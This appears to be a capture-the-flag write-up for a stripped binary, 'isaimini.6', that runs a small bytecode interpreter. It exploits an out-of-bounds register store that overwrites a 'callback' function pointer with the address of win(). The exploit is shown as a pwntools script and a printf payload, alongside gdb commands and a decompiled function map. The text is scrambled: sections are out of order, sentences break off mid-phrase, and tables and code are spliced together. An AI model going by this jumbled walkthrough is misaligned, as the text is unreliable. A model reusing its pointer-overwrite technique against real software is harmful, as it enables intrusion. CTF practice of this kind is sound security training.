Isaimini.6

Success! If the real binary prints the flag, you will see it after Success! . (gdb) file isaimini.6 (gdb) set disassembly-flavor intel (gdb) break *0x00401430 # break at start of execute() (gdb) run (gdb) x/4gx $rsp # view saved RIP after HLT (gdb) x/gx 0x00603010 # examine callback after ST (gdb) continue You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10 . When the interpreter reaches the final if(callback) check, it jumps to that address and prints the success message. 8. Full Exploit Script (Python / pwntools) #!/usr/bin/env python3 from pwn import *

regs[0] -> 0x00602000 regs[1] -> 0x00602008 ... regs[15] -> 0x00602078 regs[16] -> 0x00602080 <-- this is exactly the address of `callback` Therefore, a overwrites callback with the address of win .

FUN_00401000 entry point (main) FUN_00401200 parse_input FUN_00401430 execute FUN_00401780 op_add FUN_00401810 op_sub FUN_004018c0 op_load FUN_00401950 op_store FUN_00401b10 win int main(void) char buf[256]; read(0, buf, 256); parse_input(buf); execute(); puts("Failure!"); return 0; isaimini.6

Putting it together (little‑endian encoding for the immediate):

The goal is to craft an input that makes the interpreter print . The binary contains a hidden “secret” flag, but the only way to retrieve it is to cause the interpreter to call the function win() that prints the flag. 2. Files | File | Description | |------|-------------| | isaimini.6 | 64‑bit ELF executable (stripped, no debug symbols). | | input.txt | Empty starter file – you may ignore it and pipe your own payload to the binary. | Success

# Instead of assembling, we manually encode: payload = b"\x01\x01" + p64(win_addr) # MOV r1, win payload += b"\x05\x10\x01" # ST [r16], r1 (write win → callback) payload += b"\x09" # HLT

# Send payload p = process(binary) p.send(payload) print(p.recvall().decode()) Running this script prints the flag (or “Success!”). | Technique | Why it mattered | |-----------|-----------------| | Static analysis of a stripped binary | Ghidra’s decompiler can (gdb) file isaimini

payload=$(printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09') # Make the binary executable chmod +x isaimini.6